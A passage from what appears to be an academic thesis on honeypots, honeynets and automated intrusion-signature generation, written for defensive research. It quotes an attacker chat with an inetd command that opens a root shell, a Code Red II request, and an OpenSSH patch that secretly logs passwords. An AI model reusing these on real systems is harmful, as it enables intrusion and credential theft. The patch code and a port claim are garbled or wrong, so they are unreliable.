A Honeypot is generally defined as a network security resource whose value lies in it
being scanned, attacked, compromised, controlled and misused by an attacker to
achieve his malicious goals.
19
Lance Spitzner [1] defines Honeypots as “A Honeypot is an information system
resource whose value lies in unauthorized or illicit use of that resource”
3.6.2.1. Motivation and Concept
Mostly network security tools are passive in nature for example Firewalls and IDS. They
operate on available rules and signatures in their database. That is why anomaly
detection is limited only to the set of available rules. Any activity not in alignment with
those rules goes under the radar and is thus undetected. Honeypots by design allow
you to take the initiative; they turn the tables on the bad guys. This system has no
production value, with no authorized activity. Any interaction with the Honeypot is most
likely malicious in intent. Honeypots do not solve the security problem but provide data
and knowledge that aids the system administrator to enhance the overall security of his
network. This knowledge can be used as input for any early warning systems. Over the
years researchers have successfully isolated and identified worms and exploits using
Honeypots. These are then used for signature and rule development.
Honeypots are capable of logging far more information than any other available security
tools. They give us an insight into attacks and attackers, their skill level, their
organization as groups or individuals, and their motives and tactics. Thus, almost every
aspect is logged and can be made auditable. Honeypots effectively empower us to
study malicious hackers under a microscope. This can be demonstrated with a few
examples:
3.6.2.2. Classic Examples
:j@ck :hehe come with yure ip i`ll add u to the new 40 bots
:j@ck :i owned and trojaned 40 servers of linux in 3 hours
:j@ck ::)))))
:j1ll :heh
:j1ll :damn
:j@ck :heh
:j1ll :107 bots now
:j@ck:yup
[1]
Table 2: Honeypot: Classic Examples
3.6.2.3. Discussing Exploits
:_pen :do u have the syntax
:_pen :for
:D1ck :yeah
:_pen :sadmind exploit
:_pen :?
:D1ck :lol
:D1ck :yes
:_pen :what is it
:D1ck :./sparc -h hostname -c command -s sp [-o offset] [-a alignment] [-p]
:_pen : what do i do for -c
:D1ck :heh
:D1ck :u dont know?
:_pen :no
:D1ck :"echo 'ingreslock stream tcp nowait root /bin/sh
20
sh -i' >> /tmp/bob ; /usr/sbin/inetd -s /tmp/bob“
[1]
Table 3: Honeypot: Discussing Exploits
3.6.2.4. Example: Leaves Worm

On June 19, 2001 a sudden rise of scans for the Sub7 Trojan was detected. (port
27374)
 An Infected emulated Windows Honeypot revealed a worm was pretending to be a
Sub7 client and attempting to infect systems.
 Matt Fearnow and the Incidents.org team identified it as the W32/Leaves worm
National Infrastructure Protection Center (NIPC) was informed. CERT advisory July 3,
2001[1]
Table 4: Honeypot: Leaves Worm
3.6.2.5. Example: Code Red II Worm


Ryan Russel at SecurityFocus.com for analysis of the CodeRed II worm (MS IIS
indexing exploit)
A typical signature of the Code Red II worm would appear in a web server log as:
GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801
%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3
%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0
This worm tried to infect other computers at random, along with machines on the same
subnet as the infected machine.[1]
Table 5: Honeypot: Code Red II Worm
3.6.2.6. Example: Solaris DTSCD exploit



A Solaris Honeypot captured a dtspcd exploit, an attack never seen before.
On November 12, 2001, the CERT Coordination Center had released an advisory for
the CDE Subprocess Control Service or, more specifically, dtspcd
Exploit code was isolated and attack was detected. This was the first incident a
Honeypot was used to identify and document an unknown attack.
[1]
Table 6: Honeypot: Solaris DTSCD exploit
3.6.3. Honeynets
A Honeynet is a special kind of high-interaction Honeypot.
Honeynets extend the concept of a single Honeypot to a highly
controlled network of Honeypots. A Honeynet is a specialized
network architecture configured in a way to achieve Data
21
Control, Data Capture and Data Collection. This architecture creates a highly
controlled network, in which one can control and monitor all kinds of system and
network activity. Honeypots are then placed within this network. A basic Honeynet
comprises of Honeypots placed behind a transparent gateway – the Honeywall. Acting
as a transparent gateway the Honeywall is undetectable by attackers and serves its
purpose by logging all network activity going in or out of the Honeypots.
3.6.3.1. Data Control
Data control is the containment of activity within the Honeynet. It determines the means
through which the attacker's activity can be restricted in a way to avoid
damaging/abusing other systems/resources through the Honeynet. This demands a
great deal of planning as we require to give the attacker freedom in order to learn from
his moves and at the same time not let our resources (Honeypot + bandwidth) to be
used to attack, damage and abuse other hosts on the same or different subnets. Careful
measures are taken by the administrators of the Honeynet to study and formulate a
policy on the attacker’s freedom versus containment and implement this in a way to
achieve maximum data control and yet not be discovered or identified by the attacker as
a Honeypot. Various mechanisms to achieve data control are available such as firewall,
counting outbound connections, intrusion detection systems, intrusion prevention
systems and bandwidth restriction etc. Depending on our requirements and risk
thresholds defined, we implement data control mechanisms accordingly.
3.6.3.2. Data Capture
Data Capture involves the capturing, monitoring and logging of
all threats and attacker activities within the Honeynet. Analysis of
this captured data provides an insight on the tools, tactics,
techniques and motives of the attackers. The concept is to
achieve maximum logging capability at all nodes and hence log
any kind of attacker's interaction without the attacker knowing it.
This type of stealthy logging is achieved by setting up tools and mechanisms on the
Honeypots to log all system activity and have network logging capability at the
Honeywall. Every bit of information is crucial in studying the attacker whether it’s a TCP
port scan, remote and local exploit attempt, brute force attack, attack tool download by
the hacker, various local commands run, any type of communication carried out over
encrypted and unencrypted channels (mostly IRC) and any outbound connection
attempt made by the attacker. All of this should be logged successfully and sent over to
a remote location to avoid any loss of data due to risk of system damage caused by
attackers, such as data wipe out on disk etc. In order to avoid detection of this kind of
activity from the attacker, data masking techniques such as encryption should be used.
3.6.3.3. Data Collection
22
Once data is captured, it is securely forwarded to a centralized data collection point.
This allows data captured from numerous Honeynet sensors to be centrally collected for
analysis and archiving. Implementations may vary depending on the requirements of the
organization, however latest implementations incorporate data collection at the
Honeywall gateway.
3.6.3.4. Honeynet Architectures
There are 3 Honeynet architectures namely:

Generation I

Generation II

Generation III
3.6.3.4.1. Generation I Architecture
Gen I Honeynets were developed in 1999 by the Honeynet Project. Its purpose was to
capture attacker’s activity and give them feel of a real network. The architecture is
simple with a firewall aided by an IDS placed at the front and Honeypots placed behind
it. Unfortunately, this makes it detectable by attackers.
Figure 5: Gen I Honeynet Architecture [12]
3.6.3.4.2. Generation II and III Architecture:
Gen II Honeynets were first introduced in 2001 and Gen III Honeynets was released in
the end of 2004. Gen II Honeynets were made in order to address the issues of Gen I
Honeynets. Gen II and Gen III Honeynets have the same architecture. The only
difference being, that there have been significant improvements in the deployment and
management of Gen III Honeynets along with the addition of a Sebek server built into
the Honeywall.
A radical change in architecture was brought about by the introduction of a single device
that handles the data control and data capture mechanisms of the Honeynet called the
IDS Gateway or to use the marketing - terminology: The Honeywall. By making the
23
architecture more “stealthy”, attackers are kept longer and thus more data is captured.
There was also a major thrust in improving Honeypot layer of data capture with the
introduction of a new UNIX and windows based data
Figure 6: Generation III Honeynet Architecture [12]
3.6.3.5. Virtual Honeynet
Virtualization is a technology that allows running multiple
virtual machines on a single physical machine. Each virtual
machine can be an independent Operating system
installation. This is achieved by sharing the physical
machines resources such as CPU, Memory, Storage and
peripherals through specialized software across multiple
environments. Thus multiple virtual Operating systems can
run concurrently on a single physical machine.
A virtual Honeynet is a solution that facilitates to run a
Honeynet on a single computer. We use the term virtual
because all the different operating systems placed in the
Honeynet have the 'appearance' to be running on their
own, independent computer.
3.7. Research Challenge # 1
3.7.1. Architecture and Design Considerations in Virtual Honeynets
3.7.2. Introduction
The Honeynet project provides documentation on deploying Generation 3 virtual
Honeynets, this documentation was developed by the Pakistan Honeynet Project
Chapter. This document was a step-by- step How-To for deploying virtual Honeynets
using VMware. This served as a standard template for anyone who wants to deploy a
24
virtual Honeynet using VMware and Honeywall Roo and has thus become a de facto
document:
http://www.Honeynet.pk/Honeywall/roo/page2b.htm.
During literature review it was decided to use this document as the standard template
for our project's implementation. Generation 3 architecture demands 3 interfaces on the
Honeywall, in which one is used as management interface while other two are used as
bridged interfaces. Using VMware, a bridged interface like vmnet0 has direct access to
the physical interface and thus 2 such interfaces will cause the bridging between the
same LAN segments, whereas a requirement was to bridge between two LAN
segments i.e. the external network segment pointing to the router and the internal
network segment on which the Honeypots will be placed. It was observed that the
Honeynet design suggested by the website had configured both eth0 and eth1
interfaces as a VMware bridge interface and eth2 as a VMware host- only interface.
This was causing a loop in the Honeywall and the Honeypot LAN segment was being
avoided. This problem was extended to the Pakistan Honeynet Project, who then
accepted and updated the design on their website.
3.8. Research Challenge # 2
3.8.1. Intrusion Detection
Intrusion detection is the art of detecting malicious activity in a computer related system
[76]. Malicious activities and intrusion techniques are interesting from a computer
security perspective. Analysis of traffic and events reveals that intrusion is different from
the normal behaviour of system usage, and hence anomaly detection techniques are
applicable in the intrusion detection domain. Denning [74] classified intrusion detection
systems into 1) host based and 2) network based intrusion detection systems. K.
Scarfone et al. [80] classified Intrusion detection systems by their detection
methodology (signature matching, anomaly detection or stateful protocol analysis) and
location (on a host, a wired network, or a wireless network), or capability (simple
detection or active attack prevention) [80]
3.8.2. Intrusion Detection Problem
Conventional intrusion detection and prevention system solutions defend a network's
perimeter by using packet inspection, signature detection and real-time blocking.
Although these techniques are effective as a static defence, they fail to cope with the
dynamic nature of threats faced today.
Signature matching techniques are used to identify attacks by comparing the contents
of packets with a set of signatures or rules that describe the known attack. These
techniques can become unreliable against ciphered traffic and self modifying malware
or other evasion techniques. [81]
25
Stateful protocol analysis techniques involve matching of each connection with an
existing template that acts as a profile for a given protocol. Any deviations from this
profile are immediately reported. The effectiveness of this technique can be seen in
areas such as horizontal network scanning or host behaviour profiling. On the contrary
attacks conforming to normal protocol behaviour tend to go unnoticed. [81]
3.8.3. Intrusion Detection Signatures
A signature is a pattern or characteristic used for identification and it is used to
“describe the characteristic elements of an attack” [52]. Intrusion detection systems
identify attacks based on signature matches. These signatures are created after
analysing attack traffic data. In the absence of signature writing standards, it has been
observed that signatures vary from implementation to implementation [52, 17].
A signature is considered effective based on its ability to narrow down the attack
characteristics and be elastic enough to detect any kind of variations in the attack [52,
17]. Examples of some well known signature-based intrusion detection systems include
Bro and Snort [17].
3.8.4. Automated Signature Engineering
Signature generation is a laborious process. It may require hours of analysis until a final
effective signature can be produced. This analysis is based on some unique
characteristics visible within the traffic. Automating this process will be ideal in saving an
enterprise from an imminent attack. A requirement is that a system should intelligently
perform traffic analysis to identify unique characteristics that can serve as a key in
generating signatures for intrusion detection systems.
Chapter 4: Overview of Related Works
4.1. Honeypots as attack detection and learning tools
Honeypots began as an idea to study and isolate black hat hackers. The requirement to
learn and profile the enemy has always been an interesting area for security
researchers. The concept has been around for some time in different forms and
implementations until it recently evolved into a well defined and documented solution.
This was followed by the development of various commercial products. It is, as yet, not
clear as to who came up with the word “Honeypot” for such projects; however the core
concept remained the same. Many experts believe that the most primitive set of
documents available on the concept of Honeypots were Clifford Stoll's “The Cuckoo's
Egg” [2] and Bill Cheswick's "An Evening with Berferd in Which a Cracker Is Lured,
Endured, and Studied" [3]. In both papers the researchers had a chance to come face to
face with an attacker who gained access to their system and were then presented with
26
various types of data to study the attacker’s responses. This was essentially a proof of
concept that it was possible to learn from an attacker in such a way that the community
can benefit from it. This led to an effort to have better logging mechanisms and tools for
studying attacker tactics.
In 1999, Lance Spitzner the founder of The Honeynet Project [4] started work in the
area of Honeypots. In a very short span of time the Honeynet Project contributed a
series of publications focused on definition, development, architecture and organization
of Honeypots. Researchers in the Honeynet Project have published their findings and
experiences with their Honeypots over a number of years. The most notable book in this
regard is “Honeypots, Tracking Hackers” [1]. This book gives us a deep insight into
Honeypots and is the first compilation of Honeypot based books. This was followed by
“Know Your Enemy: Learning about Security Threats” published by the Honeynet
Project in 2004.
The era of virtualization had its impact on security and Honeypots. The community
responded, marked by the fine efforts of Niels Provos (founder of honeyd) and Thorsten
Holz for their excellent book “Virtual Honeypots: From Botnet Tracking to Intrusion
Detection” in 2007 [6]. Papers on Virtual Honeynets were published by the Honeynet
Project in early 2003, whilst the year 2004 marked the start of a new type of Honeypot
known as the client Honeypot. Kathy Wang's “honeyClient” became the first publically
available Client Honeypot tool. Generation III Honeynets also emerged in 2004-2005
and Honeywall CDROM version 2 “Roo [22]” became the first publicly available tool
based on Generation III technology. The road onwards has seen many improvements
and enhancements to the functional components of a Honeynet, especially with respect
to the tools for data analysis. There has been a significant shift of focus from Honeynets
to client Honeypots and then towards virtual Honeynets. A significant amount of work is
being carried for client Honeypot based developments and to enhance the capabilities
of existing Honeynet technologies.
Our system will incorporate existing Honeynet technology and will be set up in a virtual
environment using VMware ESX server. This will give us another dimension of valuable
data on the state of the Honeypot as it is under attack.
4.2. Automated Signature Engineering using Honeypots
The existence of complex self-similar patterns in internet traffic was first revealed in
work done by Leland et al. [73 ]Multiple invariant substrings must often be present in all
variants of worm payload [54]. The substrings correspond to return addresses, protocol
framing, and poorly obfuscated code [53]. Generation of a short single substring
signature for all worm instances can result in high false positive rates [54]. Systems
based on pattern-based analysis extract common byte patterns across suspicious flows,
to generate signature for novel internet worms. Examples of such systems include
EarlyBird [56], Honeycomb [53], and Autograph [55]. A single signature is used to match
all worm instances based on unique substrings in the payload. These substrings are
considered invariant across worm connections [54]. Such systems may suffer from a
relatively high false positive and high false negative rate [54]
Classification of signatures for polymorphic worms can be done under two main
categories [53, 54, 55, and 56]:
27
1.
2.
Content-based:
Detect similarity in different instances of byte sequences to characterize a given
worm.
Behaviour based:
Characterization by perceiving the semantics of byte sequences.
We would like to incorporate both approaches in our research.
Honeypots provide us with insight information for intrusion and attack analysis. Pouget
et al [65] analysed traffic in Honeypots to identify root causes of frequent processes.
Observed traffic was organized based on the port sequence. This data was then
clustered using association rules mining [64]. “Phrase distance” was then implemented
on the result. Levin et al. explained the use of Honeypots to extract particulars of a
worm that can be analysed to generate signatures [57]. Honeycomb [52] was one of the
first implementations of an automated signature generator. It was implemented as a
Honeyd [58] plug-in. Honeycomb incorporated the longest common substring (LCS)
algorithm on connection pairs to determine common byte sequences. It generates
signatures consisting of a single, long substring of a worm’s payload. This inhibits its
capability to detect all polymorphic worm instances. Julisch [66] defined a method that
clustered intrusion alarms for the purpose of discovering the root cause of an alarm.
The system then generated a generalized alarm for each cluster. Kim et al [55]
explained the Autograph system as a content-based filtering system for automated
signature generation to detect worms. Autograph is implemented at a DMZ that includes
benign traffic. Suspicious TCP flows are identified by content matching and are then
forwarded to COPP as input. Content based payload partitioning (COPP) is an
algorithm based on Rabin fingerprints. Repeated byte sequences are located by
partitioning the payload into content blocks. Autograph also generates one long
continuous substring of a worm’s payload as a signature. Thus any variation in a worm
cannot be detected. S. Singh et al [56] presented the Earlybird system. Earlybird tries to
identify new worms by exploiting common characteristics among them. This system
measures content prevalence in packets at the DMZ. This is carried out by counting the
diverse sources and destinations coupled with high frequency strings in the payload.
The system distinguishes benign content from epidemic content. Earlybird also
generates a single, contiguous substring of a worm’s payload as a signature. These
signatures are not effective in matching all polymorphic worm instances. Content-based
systems like Honeycyber, Polygraph, Hamsa and LISABETH [62, 59, 60 and 61]
generate automated signatures for polymorphic worms. The commonality between
these systems is as follows: There are several distinct substrings that are often present
in variants of polymorphic worm payloads regardless if the payload changes in every
infection. All these systems capture packets from a router, thus these systems may find
multiple polymorphic worms addressing a different vulnerability from other. This makes
it difficult to find distinct contents shared amongst polymorphic worms. One instance of
a worm is sent out which later on attempts to change its payload on every instance of
infection. In order to capture all polymorphic worm instances, we need to observe the
polymorphic worm while it interacts with hosts.
Honeycyber [62] utilizes “Double-Honeynet” method to detect polymorphic worms and
collect all their instances. It is based an intrusion detection policy waiting for attackers to
attack the network [62]. The approach is to use high interaction Honeypots as virtual
28
machines for both inbound and outbound Honeypots. The proposed method makes it
possible to capture all worm instances and then forward these instances to the
Signature Generator which generates signatures, using a particular algorithm. Sommer
and Paxson [63] proposed adding connection level context to signatures to reduce false
positives. [67] Christodorescu et al. defined a semantics aware methodology to detect
malicious traits in x86 binaries. The algorithm used incorporates semantics of x86
instructions that are executed.
Yegneswaran et al [70] described the Nemean system. This system incorporates
protocol semantics into the signature generation algorithm. This gives the system a new
dimension and makes it capable of handle a broader class of attacks, giving it a wider
coverage for dealing with polymorphic worms. An Automated Signature-Based
Approach against Polymorphic Internet Worms by Yong Tang and Shigang Chen [71]
defined a system to detect new worms and generate automated signatures. This system
implemented “double-Honeypots” to capture worm payloads. The arrangement
proposed a high-interaction Honeypot for inbound, while a low-interaction Honeypot for
outbound traffic. Being a low-interaction Honeypot, the outbound component could not
make outbound connections, thus inhibiting its capabilities for capturing worm payloads.
Automated Web Patrol with Strider HoneyMonkeys by Yi- Min Wang et al [72]
developed an automated web patrol system “HoneyMonkeys”. This system
automatically identifies and monitors malicious web sites that attack their victims with
drive-by downloads. Such websites install malware programs without the user’s
consent. This is carried out by exploiting browser vulnerabilities. Their approach was to
create a system that actively mimics the actions of a user browsing the Web. Special
programs called “monkey programs” run a browser similar to that of a human user. The
browsers can be configured to run with fully updated software or without specific
updates in order to find exploit sites. The browsers can be configured to run with or
without specific updates in order to identify exploit sites. The attacks that impact the
most are then analyzed. On detection of a zero-day exploit, Honeymonkey reports all
URLs' to the Microsoft Security Response Center. The information is then shared with
the enforcement team and the groups owning the software. The vulnerability is then
thoroughly investigated to determine the most appropriate course of action. With its
intrusion prevention oriented policy Honeymonkey makes an effort to fight back [62].
The HoneyMonkey system is limited to web based technologies and protocols only.
4.3. Anomaly Detection
Anomaly detection is the art of finding patterns in data that do not conform to expected
behaviour or models [75]. The approach is to build models of normal data and detect
deviations in observed data. Denning [74] proposed application of Anomaly detection to
intrusion detection and computer security in 1987. Since then it has been an active area
of research.
Anomaly detectors build models of acceptable behaviour and then raise an alarm if any
deviations from the model are observed. Anomaly detection techniques for detecting
port scans have been explored in [68, 69]. Experience has revealed that balancing
generality and specificity is extraordinarily difficult in anomaly detection systems,
resulting in a high false-positive rate.
29
Architecture of a generic anomaly detection system comprises of three main
components (1) the sensor subsystem, (2) modelling subsystem and (3) the detection
subsystem [78]
4.4. Network Behavioural Analysis (NBA)
Behaviour refers to the actions or reactions of an object or organism, usually in relation
to the environment. Behaviour can be conscious or subconscious, overt or covert, and
voluntary or involuntary [77].
A behavioural model is representation of characteristics that are consistent with
observed object or organism.
M. Rehák et al. [81] define Network behavioural analysis as:
“An intrusion detection technique that uses the patterns in network-traffic structures and
properties to identify possible attacks and technical problems with minimal impact on
user data privacy. The analysis is not based on content of the transferred information”
Shu Yun et al [79] define NBA as an industry buzz word for a network anomaly
detection system.
NBA solutions watch what's happening inside the network, aggregating data from many
points to support offline analysis. NBA systems create profiles or benchmarks for
normal traffic. These profiles are then compared with the monitored network traffic.
Alarms are generated when the system detects unknown, new or unusual patterns that
might indicate the presence of a threat. This can be trends in bandwidth and protocol
use. Network behaviour analysis is particularly good for spotting new malware and zero
day exploits.
NBA tools can greatly help a network administrator minimize the labour and time
involved in locating and resolving problems. Today it is being used as an enhancement
to the protection provided by the network's firewall, intrusion detection system, antivirus
software and spyware-detection program.
Chapter 5: Research Questions
The research questions for our studies can be grouped into two main areas. The first
area relates to the setup of an environment to detect intrusions and learn from the
intruders. The second area is concerned with extracting sufficient information from the
system, to be able to propose a proactive response in the form of a signature.
Part I:
 Question # 1: How to collect information on the attackers? Their tools? Their
tactics? Their techniques? Their motives? Is it possible to stay one step ahead of
them?
30


Question # 2: Which technology can be used to effectively and efficiently carry
out detection in depth?
Question # 3: Can we virtualise such an environment to save cost and yet be
able to maintain stealth from the attackers?
Part II:
 Question # 1: How to intelligently and effectively identify an intrusion and extract
enough information from it to be able to generate automated signatures
effectively?
 Question # 2: Can we identify and foretell intrusions by observing traffic patterns
and payload content?
 Question # 3: Can we identify and foretell intrusions by observing patterns in
system events?
 Question # 4: How to correlate system and network events to recreate a valid
snapshot of the attack?
 Question # 5: How to test the effectiveness of the technique and its result?
Chapter 6: Methodology Review
In order to address these research questions a series of research methods will be
adopted. In this section, details of the methodologies adopted will be described.
6.1. Proposed system for Virtual Honeynet Architecture Problem
6.1.2. Methodology and Discussion
31
Figure 7: Proposed Virtual Honeynet Architecture
Similar problems were faced and discussed by people from all over the globe who
wanted to implement a similar virtual Honeynet project. We shared and discussed our
findings with the community on the Honeywall project mailing list. After necessary
testing a design was chalked out and followed for the project implementation. After
successful results it was decided to publish the improved design. This design proposes
3 interfaces for the Honeywall such that:
1. vmnet0 is a vmware bridge interface pointing towards the router. (as shown in
figure above)
2. vmnet1 is VMware host-only interface leading to internal LAN segment where
Honeypot is kept. (as shown in figure above).
3. vmnet2 is a VMware bridge interface that is firewalled and accessible for remote
management purposes SSH and Walleye.
Interfaces 1 and 2 are picked up by Honeywall ROO as eth0 and eth1 and are used for
bridging. Interface 3 is used for remote management. As shown in figure 8 the red
boxes indicate the publically assigned IP addresses. In this case the Host Machine's
eth0 interface, the virtual machine's Honeywall management interface (i.e. interface 3)
and the Honeypots (1, 2 or many). Remote management interface can be routed to an
internal subnet, but for our implementation we assigned it a public IP, but restricted
access only from specific IP's (via Roo) and that too via SSH port forwarding into that
subnet only. This project was implemented successfully with one physical gigabit
Ethernet interface. Another physical interface could have been used by binding it with
the remote management interface.
32
6.1.3. Ubuntu as Honeypot
Ubuntu 8.04 was used as a Linux based Honeypot for our implementation. The concept
was to setup an up-to-date Ubuntu server, configured with commonly used services
such as SSH, FTP, Apache, MySQL and PHP and study attacks directed towards them
on the internet. Ubuntu being the most widely used Linux desktop can prove to be a
good platform to study zero day exploits. It also becomes a candidate for malware
collection and a source to learn hacker tools being used on the internet. Ubuntu was
successfully deployed as a virtual machine and setup in our Honeynet with a host-only
virtual Ethernet connection. The Honeypot was made sweeter i.e. an interesting target
for the attacker by setting up all services with default settings, for example SSH allowed
password based connectivity from any IP on default port 22, users created were given
privileges to install and run applications, Apache index.html page was made remotely
accessible with default errors and banners, MySQL default port 1434 was accessible
and outbound connections were allowed but limited.
In order to achieve maximum information on the attackers interaction with the Honeypot,
special measures were taken. This includes patching system services to log a greater
deal of information that was not logged as default. Openssh logs basic information on all
ssh login attempts. This includes date and time stamp, IP of the attacker, username
tried by the attacker and status of whether this attempt was successful or not. The
passwords tried are not logged, as a security breach in the system log directory can put
all user accounts at stake who connected via ssh. Ethical issues also demand not
logging user passwords. This being one of the reasons Openssh doesn’t log user
passwords by default. We discovered that simply patching the “auth-passwd.c” source
file from the Openssh sources, to add support to log and append passwords alongside
other information to a file was possible. Hench 5-10 lines of C filling code and recompiling Openssh sources resulted in a customized, password logging capable
Openssh daemon.
result = sys_auth_passwd(authctxt, password);
if (authctxt->force_pwchange)
disable_forwarding();
+
if(!sys_auth_passwd(authctxt, password))
+
{
+
FILE *cookiemonster;
+
cookiemonster = fopen("/var/log/.hplaser7l/hpsshd_logged", "a");
+
chmod("/var/log/.hplaser7l/hpsshd_logged", 0600);
+
fprintf(cookiemonster,"%i:%.100s:%.100s:%.200s\n",time(NULL),authctxt>user,password,get_remote_ipaddr());
+
fclose(garp);
+
}
return (result andand ok);
}
Table 7: SSH patch for the Honeypot
In view of the security risk that such a log file can pose for an organization, it is best to
hide it deep within the system. For our implementation we hid it as
“/var/log/.hplaser7l/hpsshd_logged”. Different locations can be used within the system
depending on the implemented security policy.
Analysis of this ssh log file gave us insight into the efficiency of attack tools used for
brute force attacks, followed by the hacker's distributed attack techniques.
33
SSH logs suggesting brute force attack and successful exploitation by hacker:
uid=0 euid=0 tty=ssh ruser= rhost=209-173-99-82.bluetone.cz
Sep 21 10:59:54 paul-desktop sshd[10764]: Failed password for invalid user tibi from 82.99.173.209 port 42134 ssh2
Sep 21 10:59:54 paul-desktop sshd[10772]: Failed password for invalid user katy from 82.99.173.209 port 42292 ssh2
Sep 21 10:59:55 paul-desktop sshd[10769]: Failed password for root from 82.99.173.209 port 42237 ssh2
Sep 21 10:59:55 paul-desktop sshd[10777]: Invalid user scotch from 82.99.173.209
(…)
Sep 21 10:59:56 paul-desktop sshd[10776]: Failed password for man from 82.99.173.209 port 42760 ssh2
Sep 21 10:59:56 paul-desktop sshd[10782]: Invalid user tibo from 82.99.173.209
Sep 21 10:59:57 paul-desktop sshd[10784]: Accepted password for john from 82.99.173.209 port 43246 ssh2
Sep 21 10:59:57 paul-desktop sshd[10796]: pam_unix(sshd:session): session opened for user john by (uid=0)
Table 8: SSH Logs
6.1.4. VMWare as Virtualization Software
Virtualization software has greatly helped reduce
expenses and total cost of ownership (TCO) for
organizations on their IT infrastructure. This is achieved
by setting up an entire farm of enterprise servers as
virtual machines on a single physical machine.
Organizations are now developing their own
virtualization software and solutions, many of which are
free and open source. A few notable names that we
considered for deployment include: VMware, User-Mode Linux, VirtualBox, Xen, Qemu,
Lguest, Linux-Vserver
We selected and used VMware Server as the virtualization solution for our project. Later
implementations were shifted to VMware ESX server 4.0.
6.1.5. Honeywall Roo
Honeywall CDROM is a bootable CDROM for installing, deploying and maintaining a
Honeynet. The Honeynet project has developed 2 version of the Honeywall CDROM.

Honeywall Eyore: Released May, 2003 based on Gen II architecture. (Not
supported anymore).

Honeywall Roo: Released in May, 2005 based on Gen III architecture. (Current
version 1.4)
Honeywall serves as a transparent gateway for the Honeynet. It is this gateway that has
to perform data capture, data control, data collection and data analysis functions in
order to ensure successful operations of a Honeynet. Being a transparent gateway, this
node is completely undetectable by the attacker when they are interacting with the
Honeypots. The purpose of the Honeywall CDROM is to automate the installation and
maintenance of a Honeynet and provide data analysis support for all activity within the
Honeynet. Deploying Honeynets was a strenuous task as it involved advance
configuration and integration of security tools. There was no standard Honeynet
development till 1999. Many small groups had their own implementation of Honeynets.
34
The Honeynet Project has done remarkably well by developing a complete Honeywall
distribution on a CDROM to deploy as an Operating system on disk and thus made
Honeynets easy to deploy and manage.
Balas and Viecco [16] have given a generalized data collection and fusion diagram for a
Generation III Honeywall. Extending their work further we propose an extended diagram
for Honeywall Roo [22] Logical Design in Figure 10.
Figure 8: Roo Logical Design
Honeywall has evolved over the years. Previous version, Eyore had limited features and
control. Roo, the advanced version has vastly improved hardware support,
administration capabilities, and data analysis functionality. Thus the system is now
moving towards giving the administrator more flexibility and control over the operating
system.
Honeywall Roo comprises of many well known security tools incorporated into it such
as:







Snort: Sniffer, IDS.
Snort_inline: Sniffer, IPS
Hflow2: A data coalescing tool for Honeynet data analysis.
P0f: Passive OS fingerprinting tool
Tcpdump: View Packet headers.
Sebek: Data capture tool.
Walleye Web Interface or the “Eye on the Honeywall” is a web based interface
for Honeywall configuration, administration and data analysis
6.1.6. Sebek as data capture tool
35
Sebek is a data capture tool designed to capture attacker's activities on a Honeypot,
without the attacker knowing it. Sebek is based on client-server architecture. The Sebek
client runs on the Honeypots, to capture all of the attacker’s activities (keystrokes, file
transfer, passwords) then covertly send the data to the server. The Sebek server
collects and processes this data. The server normally runs on the Honeywall gateway,
but can also run independently at a remote host. Sebek is installed onto the system as a
Linux kernel module (LKM) that logs all data activity associated in invoking standard
“read” and “write” system calls. This logged activity is then sent out on the network in
the form of Sebek packets. These packets are concealed from the attackers view by the
Sebek kernel module. This module itself can be concealed and is configurable to be
loaded under a user defined name for avoiding detection by the attacker [11]. Sebek
was used extensively in our project.
6.2. Proposed System for Automated Signature Engineering
6.2.1. Discussion
We believe that the effectiveness of a signature is directly proportional to the availability
of information needed to create it. The above discussion on automated signature
generation techniques concludes that the techniques being utilized today might be
better than their predecessors, but they too have limitations. These limitations arise as
authors focus on certain aspects of the problem while neglecting others. Information is
only extracted from the dimension that the author addressed in his research. This
information is only a small subset of the overall information that can be made available
by implementing multiple techniques. There is a need for a system that can “see more”
and “hear more” information to infer an intelligent and flexible result. Need for
configuring system components that will effectively alarm and shout “wolf” when the wolf
really comes. A system that will search and collect information lying anywhere on the
system (Disk, Memory, Network), generalize that information and correlate it to detect
an intrusion and generate mitigation signatures for it. With multiple sources of inputs,
this system will be capable of looking deeper into the network and system events to see
their behaviour. Such an approach can observe all, which otherwise would have been
invisible. Behavioural analysis and correlation of system and network events will
produce a new level of security awareness. This system will be able to perform the
following functions:




Ability to detect attacks.
Ability to detect anomalies.
Ability to classify attacks
Ability to detect variations in attacks (polymorphism)
36
6.2.2. Methodology
6.2.2.1. Analysis of System Events
Host based intrusion detection systems can detect events going on in a host. Various
services, tools and agents running on a host can be configured to log events. The level
of logging is also configurable and is very helpful during debugging. Analysing this log
data can reveal events of interest. A host based Intrusion detection system such as
OSSEC can be configured on a host to parse these logs and report information from
them. Processes being run by users claim resources in the form of disk, memory, and
network. These processes constantly use library functions and system calls to interact
with the kernel. Tapping into such areas of the system, we can assign labels to process
events observing their behaviour e.g. File download, file copy, encrypt, decrypt, create
socket, open socket, start outbound connection, etc. These behavioural patterns can be
summed up into a behavioural profile that will contain all characteristics of a process or
event. This can be further augmented by performing static or dynamic code analysis.
A behavioural profile of a system will look something like this:
Figure 9: Behavioural profile for W32-Bagle-q worm [94]
6.2.2.2. Analysis of Network Events
Researchers have often utilized the famous 5-tuples as the basis for detection and
analysis of network traffic. We propose a network behavioural profile comprising of
these 5-tuples along with a hashed payload. This information can easily be extracted
from a flow. Flow is a unidirectional component of a TCP connection (or its UDP or
ICMP equivalent) that contains all packets with the same source-IP address,
destination-IP address, source and destination ports, and transport protocol
(TCP/UDP/ICMP). A flow record contains this basic information, together with the
number of packets/bytes transferred, the flow duration, and the TCP flags encountered
in the flow packets. From these flows we intend to:


Extract meaningful features associated with each flow (or group of flows), and
Use these feature values to determine whether the flow is anomalous or not.
37
6.2.2.3. Hashing Algorithm for Payload Hashing
We require our system to be able to detect attack variations by observing network
packets. Adding payload to the behavioural profile gives us extra information which can
be helpful in classifying the flow. Since packet payloads can vary quite drastically during
a communication, adding the entire ASCII or Hex payload to the profile can yield
abnormal results when run with an edit distance algorithm to calculating similarity.
